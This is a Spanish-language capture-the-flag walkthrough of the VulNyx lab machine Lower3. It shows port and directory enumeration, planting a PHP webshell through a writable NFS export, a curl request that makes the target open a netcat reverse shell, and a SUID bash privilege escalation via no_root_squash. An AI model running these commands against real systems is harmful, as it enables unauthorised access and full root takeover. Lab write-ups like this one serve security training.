VulNyx - Lower3 | d4t4s3c hacks & pills

Information

Lower3 es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.

Enumeration

Nmap

TCP

❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.57
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-05 11:36 CEST
Nmap scan report for 192.168.1.57
Host is up (0.000090s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
34067/tcp open  unknown
39207/tcp open  unknown
47695/tcp open  unknown
50839/tcp open  unknown

❯ nmap -sVC -p22,80,111,2049,34067,39207,47695,50839 192.168.1.57
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-05 11:37 CEST
Nmap scan report for 192.168.1.57
Host is up (0.00067s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      42155/tcp6  mountd
|   100005  1,2,3      44027/udp   mountd
|   100005  1,2,3      50839/tcp   mountd
|   100005  1,2,3      56064/udp6  mountd
|   100021  1,3,4      33427/udp6  nlockmgr
|   100021  1,3,4      39207/tcp   nlockmgr
|   100021  1,3,4      41153/tcp6  nlockmgr
|   100021  1,3,4      46859/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
34067/tcp open  mountd   1-3 (RPC #100005)
39207/tcp open  nlockmgr 1-4 (RPC #100021)
47695/tcp open  mountd   1-3 (RPC #100005)
50839/tcp open  mountd   1-3 (RPC #100005)

Shell (www-data)

80/TCP (HTTP)

Site

Directory Brute Force

❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.57
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.57
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 277]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================

2049/TCP (NFS)

List

Listo la carpeta /var/www/html disponible para montar en el host remoto

❯ showmount -e 192.168.1.57
Export list for 192.168.1.57:
/var/www/html *

Mount

Al montar la carpeta /var/www/html existe un index.html del sitio web

❯ cd /dev/shm
❯ mkdir nfs
❯ mount -t nfs 192.168.1.57:/var/www/html /dev/shm/nfs -nolock
❯ cd nfs
❯ ls -l
.rw------- kali kali 10 KB Mon Jun 12 21:41:37 2023  index.html

Reverse Shell

Creo una webshell PHP en mi carpeta local /dev/shm/nfs que realmente apunta a la carpeta remota /var/www/html

❯ echo -n '<?php system($_GET["cmd"]); ?>' > cmd.php
❯ cat cmd.php ;echo
<?php system($_GET["cmd"]); ?>

Obtengo la shell como usuario low

❯ curl -sX GET "http://192.168.1.57/cmd.php?cmd=nc+192.168.1.5+443+-e+/bin/sh"

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.57] 54300
id ; hostname
uid=1000(low) gid=1000(low) groups=1000(low)
lower3

Privilege Escalation

Enumeration

Config Files

Reviso el archivo de configuración /etc/exports de NFS y dispone de no_root_squash

low@lower3:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/       *(rw,sync,insecure,no_root_squash,no_subtree_check)

Abuse

Al disponer de no_root_squash en la configuración de NFS, se pueden realizar acciones arbitrarias dentro de la montura como usuario root en un contexto privilegiado

low@lower3:/$ cd /var/www/html/
low@lower3:/var/www/html$ cp /usr/bin/bash .

Desde la montura asigno al binario bash permisos SUID (4755) y cambio de propietario a root

❯ chown root:root bash
❯ chmod 4755 bash

Desde la víctima ejecuto bash -p y me convierto en usuario root

low@lower3:/var/www/html$ ./bash -p
bash-5.1# id ; hostname
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)

Flags

Ya como usuario root puedo leer las flags user.txt y root.txt

bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
da0a4***************************
eed0b***************************

Hasta aquí la resolución de la máquina Lower3.

Happy Hacking!